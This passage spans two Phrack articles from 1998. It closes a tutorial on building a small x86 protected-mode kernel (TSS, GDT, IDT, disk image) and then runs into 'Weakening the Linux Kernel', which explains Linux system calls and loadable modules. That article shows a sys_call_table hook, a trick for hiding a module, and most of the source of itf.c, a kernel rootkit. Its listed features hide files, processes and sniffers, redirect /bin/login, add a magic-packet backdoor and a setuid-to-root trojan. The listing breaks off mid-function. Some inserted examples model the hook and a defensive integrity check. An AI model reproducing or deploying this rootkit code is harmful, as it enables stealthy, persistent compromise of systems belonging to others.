on the processor so that it can be used. 


kinit_task() now calls the kinit_ktask() function. This function creates the 
task which the kernel code will be executed as. The first thing this function 
does is to clear out the kernel's task list. This list contains a list of tasks 
on the system. Next a 4k page is allocated for the kernel task segment. The 
current executing task is then set to the kernel task. Next the task segment 
is added to the GDT. This task segment has the following structure and is 
filled out for the kernel with the following values by me. In fact all tasks 
will start out with these settings. 


typedef unsigned short ushort;  /* assumed 16-bit and 32-bit unsigned typedefs, */
typedef unsigned long  ulong;   /* as the field widths below require */

struct TSS { 
    ushort link;        // set to 0 
    ushort unused0; 
    ulong  esp0;        // set to the end of the task segment page 
    ushort ss0;         // set to SEL_KDATA (Kernel Data segment) 
    ushort unused1; 
    ulong  esp1;        // set to 0 
    ushort ss1;         // set to 0 
    ushort unused2; 
    ulong  esp2;        // set to 0 
    ushort ss2;         // set to 0 
    ushort unused3; 
    ulong  cr3;         // set to the physical address of this task's page 
                        // tables 
    ulong  eip;         // set to the entry point to this task's code 
    ulong  eflags;      // set to 0x4202 
    ulong  eax, ecx, edx, ebx, esp, ebp, esi, edi; // set to garbage values 
    ushort es;          // set to SEL_KDATA (Kernel data segment) 
    ushort unused4; 
    ushort cs;          // set to SEL_KCODE (Kernel code segment) 
    ushort unused5; 
    ushort ss;          // set to SEL_KDATA 
    ushort unused6; 
    ushort ds;          // set to SEL_KDATA 
    ushort unused7; 
    ushort fs;          // set to SEL_KDATA 
    ushort unused8; 
    ushort gs;          // set to SEL_KDATA 
    ushort unused9; 
    ushort ldt;         // set to 0 
    ushort unused10; 
    ushort debugtrap;   // set to 0 
    ushort iomapbase;   // set to 0 
}; 


The link field is used by the processor when an interrupt is called. The 
processor places a pointer to the task segment which was running prior to the 
interrupt. This is useful for determining access rights based on the calling 
process. 


The espx and ssx parameters are used to store a pointer to a stack which will 
be used when a task with a lower privilege level tries to access a high level 
privilege area. 


The cr3 parameter is used to store a pointer to the physical address of this 
task's page table. Whenever this task is switched to, the processor will load 
the value stored in cr3 into the cr3 register. This means that each task can 
have a unique set of page tables and mappings. 


The eax, ebx, etc. registers are all set to a garbage value as they are 
uninitialized and will only gain values once they are used. When the processor 
switches to this task these parameters will be loaded into their respective 
processor registers. 


The cs, es, ss, ds, fs, and gs parameters are all set to meaningful values 
which will be loaded into their respective processor registers when this 
task is switched to. 


As I am not using a local descriptor I set this parameter to 0 along with the 
debugtrap and iomapbase parameters. 


As I have mentioned every time a task is switched to the processor will load 
all of the parameters from the task segment into their respective registers. 
Likewise, when a task is switched out of, all of the registers will be stored 
in their respective parameters. This allows tasks to be suspended and to 
restart with the state they left off at. 


Switching tasks will be discussed later when the point in the kernel where this 
takes place at is reached. 


Once this task state segment is created it is necessary to create an entry in 
the GDT which points to this task segment. The format of this 64 bit entry is 
as follows: 


63 - 56   Fourth Byte of Base Address 
55        Granularity Bit 
54 - 53   0 
52        Available for use (free bit) 
51 - 48   Upper Nibble of Size 
47        Present in Memory Bit 
46 - 45   Descriptor Privilege Level 
44        System Bit 
43        16/32 Bit 
42        0 
41        Busy Bit 
40        1 
39 - 32   Third Byte of Base Address 
31 - 24   Second Byte of Base Address 
23 - 16   First Byte of Base Address 
15 - 8    Second Byte of Segment Size 
7 - 0     First Byte of Segment Size 


As you have probably noticed, this structure is very similar to the code 
segment descriptor. The differences are the 16/32 bit, and the Busy Bit. 


The 16/32 Bit specifies whether the task state segment is 16 bit or 32 bit. 
We will only be using the 32 Bit task segment (Bit = 1). The 16 bit task state 
segment was used for the 286 and was replaced by a 32 bit task state segment on 
the 386+ processors. 


The busy bit specifies whether the task is currently busy. 
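As an added example (not JeffOS code), packing and unpacking the 64-bit descriptor layout listed above and in the GDT entry description of Chapter 1, once for a flat ring 0 code segment and once for a 32-bit task state segment, together with the selector decoding from Chapter 1 (DT = selector & 0xfff8). The TSS base address is a constructed value, and the 104-byte size is the sum of the fields in the struct TSS shown earlier.

```c
#include <stdint.h>
#include <stdio.h>

/* Bit positions of a 64-bit GDT descriptor as listed in the text (shared by
 * code/data segment descriptors and the TSS descriptor; only bits 43-40 differ). */
#define D_LIMIT_LO(l)  ((uint64_t)((l) & 0xFFFFu))             /* bits 15-0  */
#define D_BASE_LO(b)   ((uint64_t)((b) & 0xFFFFu) << 16)       /* bits 31-16 */
#define D_BASE_MID(b)  ((uint64_t)(((b) >> 16) & 0xFFu) << 32) /* bits 39-32 */
#define D_TYPE(t)      ((uint64_t)((t) & 0xFu) << 40)          /* bits 43-40 */
#define D_SYSTEM(s)    ((uint64_t)((s) & 1u) << 44)            /* bit 44: 1 = code/data */
#define D_DPL(p)       ((uint64_t)((p) & 3u) << 45)            /* bits 46-45 */
#define D_PRESENT      ((uint64_t)1 << 47)                     /* bit 47 */
#define D_LIMIT_HI(l)  ((uint64_t)(((l) >> 16) & 0xFu) << 48)  /* bits 51-48 */
#define D_AVL          ((uint64_t)1 << 52)                     /* bit 52 */
#define D_DEFAULT32    ((uint64_t)1 << 54)                     /* bit 54: 32-bit */
#define D_GRAN4K       ((uint64_t)1 << 55)                     /* bit 55: limit in 4k pages */
#define D_BASE_HI(b)   ((uint64_t)(((b) >> 24) & 0xFFu) << 56) /* bits 63-56 */

/* Generic encoder: base, 20-bit limit, DPL, system bit, 4-bit type and flags. */
uint64_t desc_encode(uint32_t base, uint32_t limit, unsigned dpl, unsigned system,
                     unsigned type, uint64_t flags)
{
    return D_LIMIT_LO(limit) | D_BASE_LO(base) | D_BASE_MID(base) | D_TYPE(type) |
           D_SYSTEM(system) | D_DPL(dpl) | D_LIMIT_HI(limit) | D_BASE_HI(base) | flags;
}

/* Decoders that reassemble the split base and limit fields. */
uint32_t desc_base(uint64_t d)
{
    return (uint32_t)((d >> 16) & 0xFFFFu) | (uint32_t)((d >> 32) & 0xFFu) << 16 |
           (uint32_t)((d >> 56) & 0xFFu) << 24;
}
uint32_t desc_limit(uint64_t d)
{
    return (uint32_t)(d & 0xFFFFu) | (uint32_t)((d >> 48) & 0xFu) << 16;
}
unsigned desc_bit(uint64_t d, unsigned bit) { return (unsigned)((d >> bit) & 1u); }
unsigned desc_dpl(uint64_t d)               { return (unsigned)((d >> 45) & 3u); }

/* Segment size in bytes: limit+1 bytes (G = 0) or limit+1 pages of 4k (G = 1). */
uint64_t desc_size_bytes(uint64_t d)
{
    uint64_t limit = desc_limit(d);
    return desc_bit(d, 55) ? (limit + 1) << 12 : limit + 1;
}

/* Ring 0 flat 32-bit code segment: base 0, limit 0xFFFFF pages (4GB), type bits
 * 43-40 = code(1) conforming(0) readable(1) accessed(0) = 1010b. */
uint64_t flat_kernel_code_desc(void)
{
    return desc_encode(0, 0xFFFFFu, 0, 1, 0xAu, D_PRESENT | D_DEFAULT32 | D_GRAN4K);
}

/* 32-bit TSS descriptor: system bit 44 = 0, bits 43-40 = 32-bit(1) 0 busy(0) 1
 * = 1001b, byte granularity, limit = size - 1. */
uint64_t tss32_desc(uint32_t base, uint32_t size)
{
    return desc_encode(base, size - 1, 0, 0, 0x9u, D_PRESENT);
}

/* Selector: bits 15-3 descriptor table index, bit 2 table indicator,
 * bits 1-0 requestor privilege level; DT = selector & 0xfff8. */
unsigned sel_index(uint16_t sel)        { return sel >> 3; }
unsigned sel_table_offset(uint16_t sel) { return sel & 0xfff8u; }
unsigned sel_ti(uint16_t sel)           { return (sel >> 2) & 1u; }
unsigned sel_rpl(uint16_t sel)          { return sel & 3u; }

int main(void)
{
    uint64_t code = flat_kernel_code_desc();
    uint64_t tss  = tss32_desc(0x12345678u, 104);   /* constructed TSS base address */
    printf("code descriptor %016llx, %llu bytes\n",
           (unsigned long long)code, (unsigned long long)desc_size_bytes(code));
    printf("tss descriptor  %016llx, base %08x limit %u busy %u\n",
           (unsigned long long)tss, desc_base(tss), desc_limit(tss), desc_bit(tss, 41));
    printf("selector 0x13: index %u (offset 0x%x) TI %u RPL %u\n",
           sel_index(0x13), sel_table_offset(0x13), sel_ti(0x13), sel_rpl(0x13));
    return 0;
}
```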


Once the kernel task is allocated, a new kernel stack is allocated and made 
active. This allows the stack to be in a known and mapped in location which 
uses the memory manager of the kernel. 


The user task is then created in a similar fashion as the kernel task. In 
this current implementation the user task is located at 0x20000. Its stack 
is located at 0x2107c. Currently, this user task operates with OS level 
privilege. I encountered some problems when changing its selectors to user 
entries in the GDT. As soon as I fix this problem I will post a fix on my web 
site. After the user task is created it is added to the task queue to be 
switched to once the scheduler starts. 


Now that the kernel task and a user task (though running with kernel privilege 
level) have been created it is necessary to set up the interrupt tables. This 
is done by a call to the kinit_idt() function. 


kinit_idt() starts by setting all of the interrupts to point to a null 
interrupt function. This means that for most interrupts a simple return 
occurs. However, interrupt handlers are installed for the timer as well as for 
one system call. Also, interrupts are set up to handle the various exceptions. 
Once this table is filled out the interrupt descriptor table (IDT) is loaded 
into the idt register. The interrupts are then enabled to allow them to be 
called. 


The timer interrupt handler is a simple function which calls a task switch 
every time the hardware timer fires. 


When the system call (interrupt 22h) is called, the handler will print out on 
the console the string which is pointed to by the eax register. 


The exception handling routine will dump the task registers and then hang the 
system. The jump.S file in JeffOS/kernel/ contains the assembly wrappers which 
are called when an interrupt occurs. These wrapper functions then call the C 
handler functions. 


Now that the IDT is set up and interrupts are occurring task switches can occur. 
These occur when the swtch() function is called in the task.c file. The 
swtch() function locates the next task in its queue and does a call to the 
selector address of the new task. This causes the processor to look up the 
selector and switch to the new task. 


You now have a very simple multi-tasking kernel. 


----[ Chapter 4 User level libraries 


The user level libraries are fairly simplistic. 


There are two files in this directory. The first is the crt0.c file. 
This file contains one function which is the _start() function. This function 
makes a call to main which will be defined in user code. This stub function 
must always be linked in first as it will be jumped into by the kernel to 
begin running the process. 


The second file is the syscall.c file. This file contains one system call 
function which is simply an interrupt 22. This interrupt calls the console 
system call. eax is passed in as a pointer to a string which is printed to 
the system console. 


Both of these source files are compiled to objects and are used during the 
linking phase of any user code. 


----[ Chapter 5 User code 


The user code is stored in one file called test.c. This file is located in 
the /user/ directory. All this code does is call the console system call 
function provided by the library, wait a short amount of time, and call it 
again in a non-terminating loop (good thing, as I don’t handle task 
termination yet). 


The important thing to note is that when linking, this user process is set to 
have a text segment of 20000h linear. Also the crt0.o and syscall.o files are 
linked in as well. crt0.o is linked in first to ensure that its _start() 
function is at 20080h so it will be jumped into by the kernel. In truth, 
_start() is the real main as opposed to the main() everyone is used to dealing 
with. 


This code is the task which is created and run alongside the kernel, as 
described in chapter 3. 


----[ Chapter 6 - Creating a disk image out of the binaries 


Once you have compiled all of the binaries and placed them into the build 
directory you will need to create two more files before continuing. These 
files are called STUFF.BIN and STUFF2.BIN. These files are simply containers 
of empty space to cause alignment of other binaries. The floppy loader 
expects the user program to be 1k in size. If the user program is not exactly 
this size then STUFF2.BIN needs to be created and be of such a size that when 
added to USER.BIN the size is 1024 bytes. Also, the floppy boot loader 
expects the kernel boot loader to be 3.5k (3584 bytes) in size. STUFF.BIN 
needs to be made of such length that when added to the size of the BOOT.BIN 
(kernel boot loader) file the size will be 3584 bytes. In the future I will 
try to automate this process, but for now this is simply how it must be done. 
Once this is complete the shell program ’go’ must be run. This will place all 
of the binary files into one file called ’os.bin’. This file can then be 
written to disk by one of the following two methods. 


If you want to do it from linux you can do the following command: 
dd if=os.bin of=/dev/fd0 (places os.bin directly onto the floppy disk) 


or from DOS you can obtain the rawrite command and run it and follow its 
directions. 


----[ Conclusion 


The kernel contained within is far from complete. However, it is a first step 
towards creating a real protected mode operating system. It is also enough to 
begin working with, or to refer to during your own work on a protected mode 
operating system. Doing this work is simply both one of the most rewarding 
things you will ever do, and one of the most frustrating. Many a night has 
been spent at the local tavern telling war stories about this stuff. But in 
the end, it has all been great fun. 


I wish you all the best of luck! 


Jeff Thompson 
jwthomp@cu-online.com 
http://www.cu-online.com/~jwthomp/ 
---[ Phrack Magazine Volume 8, Issue 52 January 26, 1998, article 18 of 
[ Weakening the Linux Kernel 
[ plaguez <dube0866@eurobretagne.fr> 
----[ Preamble 
The following applies to the Linux x86 2.0.x kernel series. It may also be 
accurate for previous releases, but has not been tested. 2.1.x kernels 
introduced a bunch of changes, most notably in the memory management routines, 
and are not discussed here. 


Thanks to Halflife and Solar Designer for lots of neat ideas. Brought to you 
by plaguez and WSD. 


----[ User space vs. Kernel space 


Linux supports a number of architectures, however most of the code and 
discussion in this article refers to the i386 version only. 


Memory is divided into two parts: kernel space and user space. Kernel space 
is defined in the GDT, and mapped to each process's address space. User 
space is in the LDT and is local to each process. A given program can't 
write to kernel memory even when it is mapped because it is not in the 
same ring. 


You also can not access user memory from the kernel typically. However, 
this is really easy to overcome. When we execute a system call, one 
of the first things the kernel does is set ds and es up so that memory 
references point to the kernel data segment. It then sets up fs so that 
it points to the user data segment. If we want to use kernel memory 
in a system call, all we should have to do is push fs, then set it to ds. 
Of course, I have not actually tested this, so take it with a pound or 
two of salt :). 


Here are a few of the useful functions to use in kernel mode for transferring 
data bytes to or from user memory: 


#include <asm/segment.h> 


get_user(ptr) 
Gets the given byte, word, or long from user memory. This is a macro; 
it relies on the type of the argument to determine the number of bytes to 
transfer. You then have to use typecasts wisely. 


put_user(ptr) 
This is the same as get_user(), but instead of reading, it writes data 
bytes to user memory. 


memcpy_fromfs(void *to, const void *from, unsigned long n) 
Copies n bytes from *from in user memory to *to in kernel memory. 


memcpy_tofs(void *to, const void *from, unsigned long n) 
Copies n bytes from *from in kernel memory to *to in user memory. 


----[ System calls 


Most libc function calls rely on underlying system calls, which are the 
simplest kernel functions a user program can call. These system calls are 
implemented in the kernel itself or in loadable kernel modules, which are 
little chunks of dynamically linkable kernel code. 


Like MS-DOS and many others, Linux system calls are implemented through a 
multiplexor called with a given maskable interrupt. In Linux, this interrupt 
is int 0x80. When the ’int 0x80’ instruction is executed, control is given to 
the kernel (or, more accurately, to the function _system_call()), and the 
actual demultiplexing process occurs. 


The _system_call() function works as follows: 

First, all registers are saved and the content of the %eax register is checked 
against the global system calls table, which enumerates all system calls and 
their addresses. This table can be accessed with the extern void 
*sys_call_table[] variable. A given number and memory address in this table 
corresponds to each system call. System call numbers can be found in 
/usr/include/sys/syscall.h. They are of the form SYS_systemcallname. If the 
system call is not implemented, the corresponding cell in the sys_call_table 
is 0, and an error is returned. Otherwise, the system call exists and the 
corresponding entry in the table is the memory address of the system call code. 


Here is an example of an invalid system call: 


[root@plaguez kernel]# cat no1.c 
#include <linux/errno.h> 
#include <sys/syscall.h> 
#include <errno.h> 


extern void *sys_call_table[]; 


sc() 
{       // system call number 165 doesn't exist at this time. 
        __asm__ ("movl $165, %eax\n\t" 
                 "int $0x80"); 
} 
main() 
{ 
        errno = -sc(); 
        perror("test of invalid syscall"); 
} 
[root@plaguez kernel]# gcc no1.c 
[root@plaguez kernel]# ./a.out 
test of invalid syscall: Function not implemented 
[root@plaguez kernel]# exit 


Normally, control is then transferred to the actual system call, which performs 
whatever you requested and returns. _system_call() then calls 
ret_from_sys_call() to check various stuff, and ultimately returns to user 
memory. 


----[ libc wrappers 


The int $0x80 isn't used directly for system calls; rather, libc functions, 
which are often wrappers to interrupt 0x80, are used. 


libc is actually the user space interface to kernel functions. 


libc generally features the system calls using the _syscallX() macros, where X 
is the number of parameters for the system call. 


For example, the libc entry for write(2) would be implemented with a _syscall3 
macro, since the actual write(2) prototype requires 3 parameters. Before 
calling interrupt 0x80, the _syscallX macros are supposed to set up the stack 
frame and the argument list required for the system call. Finally, when the 
_system_call() (which is triggered with int $0x80) returns, the _syscallX() 
macro will check for a negative return value (in %eax) and will set errno 
accordingly. 


Let’s check another example with write(2) and see how it gets preprocessed. 


[root@plaguez kernel]# cat no2.c 
#include <linux/types.h> 
#include <linux/fs.h> 
#include <sys/syscall.h> 
#include <asm/unistd.h> 
#include <sys/types.h> 
#include <stdio.h> 
#include <errno.h> 
#include <fcntl.h> 
#include <ctype.h> 


_syscall3(ssize_t,write,int,fd,const void *,buf,size_t,count); 


main() 
{ 
        char *t = "this is a test.\n"; 
        write(0, t, strlen(t)); 
} 
[root@plaguez kernel]# gcc -E no2.c > no2.C 
[root@plaguez kernel]# indent no2.C -kr 
indent:no2.C:3304: Warning: old style assignment ambiguity in "=-".  Assuming "= -" 

[root@plaguez kernel]# tail -n 50 no2.C 
# 9 "no2.c" 2 


ssize_t write(int fd, const void *buf, size_t count) 
{ 
        long __res; 
        __asm__ __volatile__("int $0x80":"=a"(__res):"0"(4), "b"((long) (fd)), 
                             "c"((long) (buf)), "d"((long) (count))); 
        if (__res >= 0) 
                return (ssize_t) __res; 
        errno = -__res; 
        return -1; 
}; 
main() 
{ 
        char *t = "this is a test.\n"; 
        write(0, t, strlen(t)); 
} 
[root@plaguez kernel]# exit 
Note that the '4' in the write() function above matches the SYS_write 
definition in /usr/include/sys/syscall.h. 


----[ Writing your own system calls. 


There are a few ways to create your own system calls. For example, you could 
modify the kernel sources and append your own code. A far easier way, however, 
would be to write a loadable kernel module. 
A loadable kernel module is nothing more than an object file containing code 
that will be dynamically linked into the kernel when it is needed. 


The main purposes of this feature are to have a small kernel, and to load a 
given driver when it is needed with the insmod(1) command. It's also easier 
to write a lkm than to write code in the kernel source tree. 


With lkm, adding or modifying system calls is just a matter of modifying the 
sys_call_table array, as we’ll see in the example below. 


----[ Writing a lkm 


An lkm is easily written in C. It contains a chunk of #defines, the body of the
code, an initialization function called init_module(), and an unload function
called cleanup_module(). The init_module() and cleanup_module() functions
will be called at module loading and removal. Also, don't forget that
modules are kernel code, and though they are easy to write, any programming
mistake can have quite serious results.


Here is a typical lkm source structure: 


#define MODULE
#define __KERNEL__

#include <linux/config.h>
#ifdef MODULE
#include <linux/module.h>
#include <linux/version.h>
#else
#define MOD_INC_USE_COUNT
#define MOD_DEC_USE_COUNT
#endif

#include <linux/types.h>
#include <linux/fs.h>
#include <linux/mm.h>
#include <linux/errno.h>
#include <asm/segment.h>
#include <sys/syscall.h>
#include <linux/dirent.h>
#include <asm/unistd.h>
#include <sys/types.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <ctype.h>

int errno;
char tmp[64];

/* for example, we may need to use ioctl */
_syscall3(int, ioctl, int, d, int, request, unsigned long, arg);

int myfunction(int parm1, char *parm2)
{
  int i, j, k;
  /* ... */
}

int init_module(void)
{
  /* ... */
  printk("\nModule loaded.\n");
  return 0;
}

void cleanup_module(void)
{
  /* ... */
  printk("\nModule unloaded.\n");
}


Check the mandatory #defines (#define MODULE, #define __KERNEL__) and 
#includes (#include <linux/config.h> ...) 


Also note that as our lkm will be running in kernel mode, we can’t use libc 
functions, but we can use system calls with the previously discussed 
_syscallX() macros or call them directly using the pointers to functions 
located in the sys_call_table array. 


You would compile this module with ’gcc -c -O3 module.c’ and insert it into 
the kernel with ’insmod module.o’ (optimization must be turned on). 


As the title suggests, lkm can also be used to modify kernel code without 
having to rebuild it entirely. For example, you could patch the write(2) 
system call to hide portions of a given file. Seems like a good place for 
backdoors, also: what would you do if you couldn’t trust your own kernel? 


----[ Kernel and system calls backdoors


The main idea behind this is pretty simple. We’1ll redirect those damn system 
calls to our own system calls in a lkm, which will enable us to force the 
kernel to react as we want it to. For example, we could hide a sniffer by 
patching the IOCTL system call and masking the PROMISC bit. Lame but 
efficient. 


To modify a given system call, just add the definition of the extern void 
*sys_call_table[] in your lkm, and have the init_module() function modify the 
corresponding entry in the sys_call_table to point to your own code. The 
modified call can then do whatever you wish it to, meaning that as all user 
programs rely on those kernel calls, you’1ll have entire control of the system. 


This point raises the fact that it can become very difficult to prevent 
intruders from staying in the system when they’ve broken into it. Prevention 
is still the best way to security, and hardening the Linux kernel is needed on 
sensitive boxes. 
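The redirection done in init_module(), and the check a defender would run against it, can be modelled outside the kernel. The following is an added example written for this page, not plaguez's code: a userspace C program in which an array of function pointers stands in for sys_call_table, the slot number NR_setreuid is an assumed one, a hook saves and replaces one entry the way the swatch module further down does, and a snapshot of the table recorded while it is trusted reveals the modified entry afterwards.

```c
/* Userspace model of sys_call_table redirection and of the integrity check
 * that catches it. Constructed example: the table is an ordinary array of
 * function pointers standing in for the kernel's sys_call_table; the slot
 * number NR_setreuid is made up for the demo. */
#include <stdio.h>
#include <string.h>

#define NR_CALLS     4
#define NR_setreuid  2          /* assumed slot number, not the real one */

typedef long (*syscall_fn)(long, long, long);

/* "Original" handlers. */
static long sys_dummy(long a, long b, long c)
{
    (void)a; (void)b; (void)c;
    return 0;
}

static long sys_setreuid(long ruid, long euid, long unused)
{
    (void)unused;
    return (ruid >= 0 && euid >= 0) ? 0 : -1;   /* -EINVAL in the real kernel */
}

static syscall_fn sys_call_table[NR_CALLS] = {
    sys_dummy, sys_dummy, sys_setreuid, sys_dummy
};

/* Dispatcher standing in for the int $0x80 entry point. */
static long do_syscall(int nr, long a, long b, long c)
{
    return sys_call_table[nr](a, b, c);
}

/* ---- attacker side: what the lkm's init_module() / cleanup_module() do ---- */
static syscall_fn o_setreuid;          /* saved original entry */
static long hook_calls;                /* how many calls went through the hook */
static long last_euid = -1;            /* what swatch would printk() */

static long n_setreuid(long ruid, long euid, long c)
{
    hook_calls++;
    last_euid = euid;
    return o_setreuid(ruid, euid, c);  /* pass through to the real handler */
}

static void install_hook(void)
{
    o_setreuid = sys_call_table[NR_setreuid];
    sys_call_table[NR_setreuid] = n_setreuid;
}

static void remove_hook(void)
{
    sys_call_table[NR_setreuid] = o_setreuid;
}

/* ---- defender side: snapshot the table while it is trusted, re-check later ---- */
static syscall_fn baseline[NR_CALLS];

static void record_baseline(void)
{
    memcpy(baseline, sys_call_table, sizeof(baseline));
}

/* Returns how many entries differ from the snapshot; 0 means untouched. */
static int count_modified_entries(void)
{
    int nr, bad = 0;
    for (nr = 0; nr < NR_CALLS; nr++)
        if (sys_call_table[nr] != baseline[nr])
            bad++;
    return bad;
}

int main(void)
{
    record_baseline();
    install_hook();
    do_syscall(NR_setreuid, 0, 1000, 0);
    printf("hook saw %ld call(s), euid=%ld; modified entries: %d\n",
           hook_calls, last_euid, count_modified_entries());
    remove_hook();
    printf("after cleanup, modified entries: %d\n", count_modified_entries());
    return 0;
}
```

The check is only as good as the snapshot: it has to be taken before the box is compromised and kept where the intruder cannot rewrite it. On a 2.0 system the equivalent is comparing the live sys_call_table entries against the addresses in System.map; the get_kernel_syms hook in itf.c further down shows why a check that asks the running kernel for its own symbols can be lied to.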


----[ A few programming tricks 


- Calling system calls within an lkm is pretty easy as long as you pass user
space arguments to the given system call. If you need to pass kernel space
arguments, you need to be sure to modify the fs register (in 2.0 kernels: save
get_fs(), do set_fs(get_ds()) around the call, then restore the saved value),
or else everything will fall on its face. It is just a matter of storing the
system call function in a "pointer to function" variable, and then using this
variable. For example:


#define MODULE
#define __KERNEL__

#include <linux/config.h>
#ifdef MODULE
#include <linux/module.h>
#include <linux/version.h>
#else
#define MOD_INC_USE_COUNT
#define MOD_DEC_USE_COUNT
#endif

#include <linux/types.h>
#include <linux/fs.h>
#include <linux/mm.h>
#include <linux/errno.h>
#include <asm/segment.h>
#include <sys/syscall.h>
#include <unistd.h>
#include <linux/unistd.h>

int errno;

/* pointer to the old setreuid system call */
int (*o_setreuid) (uid_t, uid_t);

/* the system calls vectors table */
extern void *sys_call_table[];

int n_setreuid(uid_t ruid, uid_t euid)
{
  printk("uid %i trying to seteuid to euid=%i", current->uid, euid);
  return (*o_setreuid) (ruid, euid);
}

int init_module(void)
{
  o_setreuid = sys_call_table[SYS_setreuid];
  sys_call_table[SYS_setreuid] = (void *) n_setreuid;
  printk("swatch loaded.\n");
  return 0;
}

void cleanup_module(void)
{
  sys_call_table[SYS_setreuid] = o_setreuid;
  printk("swatch unloaded.\n");
}


- Hiding a module can be done in several ways. As Runar Jensen showed in
Bugtraq, you could strip /proc/modules on the fly, when a program tries to
read it. Unfortunately, this is somewhat difficult to implement and, as it
turns out, this is not a good solution since doing a
'dd if=/proc/modules bs=1' would show the module. We need to find another
solution. Solar Designer (and other nameless individuals) have one.
Since the module info list is not exported from the kernel, there is no direct
way to access it, except that this module info structure is used in
sys_init_module(), which calls our init_module()! Provided that gcc does not
clobber the registers before entering our init_module(), it is possible to get
the register previously used for struct module *mp and then to get the address
of one of the items of this structure (which is a circular list, by the way). So,
our init_module() function will include something like this at its beginning:


int init_module()
{
  register struct module *mp asm("%ebx");  /* or whatever register it is in */
  *(char *) mp->name = 0;
  mp->size = 0;
  mp->ref = 0;
  /* ... */
}


Since the kernel does not show modules with no name and no references
(= kernel modules), ours won't be shown in /proc/modules.


----[ A practical example 
Here is itf.c. The goal of this program is to demonstrate kernel backdooring
techniques using system call redirection. Once installed, it is very hard to
spot.


Its features include: 


- stealth functions: once insmod'ed, itf will modify struct module *mp and
hook get_kernel_syms(2) so it won't appear in /proc/modules or in ksyms' output.
Also, the module cannot be unloaded.

- sniffer hider: itf will backdoor ioctl(2) so that the PROMISC flag will be
hidden. Note that you'll need to start the sniffer BEFORE insmod'ing itf.o,
because itf will trap a change in the PROMISC flag and will then stop hiding
it (otherwise you'd just have to do an 'ifconfig eth0 +promisc' and you'd spot
the module...).

- file hider: itf will also patch the getdents(2) system call, thus hiding
files containing a certain word in their filename.

- process hider: using the same technique as described above, itf will hide
/proc/PID directories using argv entries. Any process named with the magic
name will be hidden from the procfs tree.

- execve redirection: this implements Halflife's idea discussed in P51.
If a given program (notably /bin/login) is execve'd, itf will execve
another program instead. It uses tricks to overcome Linux memory management
limitations: brk(2) is used to increase the calling program's data segment
size, thus allowing us to allocate user memory while in kernel mode (remember
that most system calls expect their arguments in user memory, not kernel memory).

- socket recvfrom() backdoor: when a packet matching a given size and a given
string is received, a non-interactive program will be executed. Typical use
is a shell script (which will be hidden using the magic name) that opens
another port and waits there for shell commands.

- setuid() trojan: like Halflife's stuff. When a setuid() syscall with uid ==
magic number is done, the calling process will get uid = euid = gid = 0.

<++> lkm_trojan.c
/*
 * itf.c v0.8
 * Linux Integrated Trojan Facility
 * (c) plaguez 1997 dube0866@eurobretagne.fr
 *
 * This is mostly not fully tested code. Use at your own risks.
 *
 * compile with:
 *   gcc -c -O3 -fomit-frame-pointer itf.c
 * Then:
 *   insmod itf
 *
 * Thanks to Halflife and Solar Designer for their help/ideas.
 *
 * Greets to: w00w00, GRP, #phrack, #innuendo, K2, YmanZ, Zemial.
 */

#define MODULE
#define __KERNEL__

#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>

#include <linux/types.h>
#include <linux/fs.h>
#include <linux/mm.h>
#include <linux/errno.h>
#include <asm/segment.h>
#include <asm/pgtable.h>
#include <sys/syscall.h>
#include <linux/dirent.h>
#include <asm/unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/socketcall.h>
#include <linux/netdevice.h>
#include <linux/if.h>
#include <linux/if_arp.h>
#include <linux/if_ether.h>
#include <linux/proc_fs.h>
#include <stdio.h>
#include <errno.h>
#include <fcntl.h>
#include <ctype.h>

/* Customization section
 * - RECVEXEC is the full pathname of the program to be launched when a packet
 *   of size MAGICSIZE and containing the word MAGICNAME is received with recvfrom().
 *   This program can be a shell script, but must be able to handle a null **argv (I'm too lazy
 *   to write more than execve(RECVEXEC,NULL,NULL); :)
 * - NEWEXEC is the name of the program that is executed instead of OLDEXEC
 *   when an execve() syscall occurs.
 * - MAGICUID is the numeric uid that will give you root when a call to setuid(MAGICUID)
 *   is made (like Halflife's code)
 * - files containing MAGICNAME in their full pathname will be invisible to
 *   a getdents() system call.
 * - processes containing MAGICNAME in their process name will be hidden from the
 *   procfs tree.
 */

#define MAGICNAME "w00w00TS!"
#define MAGICUID 31337

#define OLDEXEC "/bin/login"
#define NEWEXEC "/.w00w00TS!/w00w00TS!login"
#define RECVEXEC "/.w00w00TS!/w00w00TS!recv"

#define MAGICSIZE (sizeof(MAGICNAME) + 10)

/* old system calls vectors */
int (*o_getdents) (uint, struct dirent *, uint);
ssize_t (*o_readdir) (int, void *, size_t);
int (*o_setuid) (uid_t);
int (*o_execve) (const char *, const char *[], const char *[]);
int (*o_ioctl) (int, int, unsigned long);
int (*o_get_kernel_syms) (struct kernel_sym *);
ssize_t (*o_read) (int, void *, size_t);
int (*o_socketcall) (int, unsigned long *);

/* entry points to brk() and fork() syscall. */
static inline _syscall1(int, brk, void *, end_data_segment);
static inline _syscall0(int, fork);
static inline _syscall1(void, exit, int, status);

extern void *sys_call_table[];
extern struct proto tcp_prot;
int errno;

char mtroj[] = MAGICNAME;
int __NR_myexecve;
int promisc;

/*
 * String-oriented functions (from user-space to kernel-space or the reverse)
 */

/* copy at most n bytes of a user-space string into a kernel-space buffer */
char *strncpy_fromfs(char *dest, const char *src, int n)
{
    char *tmp = (char *) src;
    int compt = 0;

    do {
        dest[compt++] = __get_user(tmp++, 1);
    }
    while ((dest[compt - 1] != '\0') && (compt != n));

    return dest;
}

/* decimal string to int; returns -1 on any non-digit (used on /proc entry names) */
int myatoi(char *str)
{
    int res = 0;
    int mul = 1;
    char *ptr;

    for (ptr = str + strlen(str) - 1; ptr >= str; ptr--) {
        if (*ptr < '0' || *ptr > '9')
            return (-1);
        res += (*ptr - '0') * mul;
        mul *= 10;
    }
    return (res);
}

/*
 * process hiding functions
 */

/* walk the circular task list, starting at current */
struct task_struct *get_task(pid_t pid)
{
    struct task_struct *p = current;

    do {
        if (p->pid == pid)
            return p;
        p = p->next_task;
    }
    while (p != current);

    return NULL;
}

/* the following function comes from fs/proc/array.c */
static inline char *task_name(struct task_struct *p, char *buf)
{
    int i;
    char *name;

    name = p->comm;
    i = sizeof(p->comm);
    do {
        unsigned char c = *name;
        name++;
        i--;
        *buf = c;
        if (!c)
            break;
        if (c == '\\') {
            buf[1] = c;
            buf += 2;
            continue;
        }
        if (c == '\n') {
            buf[0] = '\\';
            buf[1] = 'n';
            buf += 2;
            continue;
        }
        buf++;
    }
    while (i);
    *buf = '\n';
